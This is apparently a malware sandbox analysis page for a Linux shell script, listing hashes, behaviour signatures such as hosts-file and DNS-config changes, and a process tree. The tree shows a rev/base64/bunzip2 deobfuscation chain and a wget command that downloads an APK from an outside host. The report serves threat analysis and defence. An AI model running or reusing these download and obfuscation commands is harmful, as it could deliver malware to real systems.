902a66ff2a651275836d70b621a02225c3cdefc98dc4d28faee3ba772f65da2b

Analysis

max time kernel
0s
max time network
6s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
15/03/2023, 11:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

app_mod copy.sh_
Size

51KB
MD5

5a8c1fac337fb034f3a7456b0c416758
SHA1

d883644c417a5f1543b88f2ac407ee84e1425420
SHA256

902a66ff2a651275836d70b621a02225c3cdefc98dc4d28faee3ba772f65da2b
SHA512

8adba312ef13f5628bffbb6f399f65d50f7479874fda4c191bc10e51fd48a49d5b8d247bc2cfbc99d6fe9a76fe5500976571d6ac4a150efae144ece3f5d1248a
SSDEEP

1536:DxEyGznImjPZzlz1pxvp4eWbOvWM2I306DMmAgu:DxEyGznI4xl4jOvzhDMz

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

description	ioc
/proc/602	/proc/602
/proc/570	/proc/570

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/sh-thd.EmXjPo	/tmp/sh-thd.EmXjPo	Process not Found
/tmp/app_mod copy.sh_	/tmp/app_mod copy.sh_	app_mod copy.sh_
/tmp/sh-thd.ZFvVtn	/tmp/sh-thd.ZFvVtn	app_mod copy.sh_
/tmp/sh-thd.BpomRu	/tmp/sh-thd.BpomRu	Process not Found
/tmp/sh-thd.wL9NFv	/tmp/sh-thd.wL9NFv	Process not Found
/tmp/sh-thd.Sh0Om8	/tmp/sh-thd.Sh0Om8	Process not Found

/tmp/app_mod copy.sh_
"/tmp/app_mod copy.sh_"
1⤵
- Writes file to tmp directory
PID:570

/usr/bin/rev
rev
1⤵
PID:573

/usr/bin/base64
base64 -d
1⤵
PID:577

/bin/bunzip2
bunzip2 -c
1⤵
PID:578

/bin/cat
cat
1⤵
PID:586

./!
"./!"
1⤵
PID:591

/bin/bash
bash -c ";"
1⤵
PID:593

/usr/bin/rev
rev
1⤵
PID:598

/bin/bash
bash
1⤵
PID:595
- /bin/bash
  /bin/bash
  2⤵
  PID:599
- - /bin/bash
    bash
    3⤵
    PID:602

/usr/bin/base64
base64 -d
1⤵
PID:605

/bin/bunzip2
bunzip2 -c
1⤵
PID:606

/bin/cat
cat
1⤵
PID:610

./_
./_
1⤵
PID:615

/bin/bash
bash -c ";"
1⤵
PID:617

/usr/bin/wget
wget -o wikipedia.apk https://int3.sk/wikipedia.apk
1⤵
- Modifies hosts file
- Writes DNS configuration
PID:619

/sbin/ip
ip addr
1⤵
PID:621

/bin/grep
grep 192
1⤵
PID:622

/usr/bin/awk
awk "{print \$2}"
1⤵
PID:623

/usr/bin/cut
cut -d. -f 1-3
1⤵
PID:624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...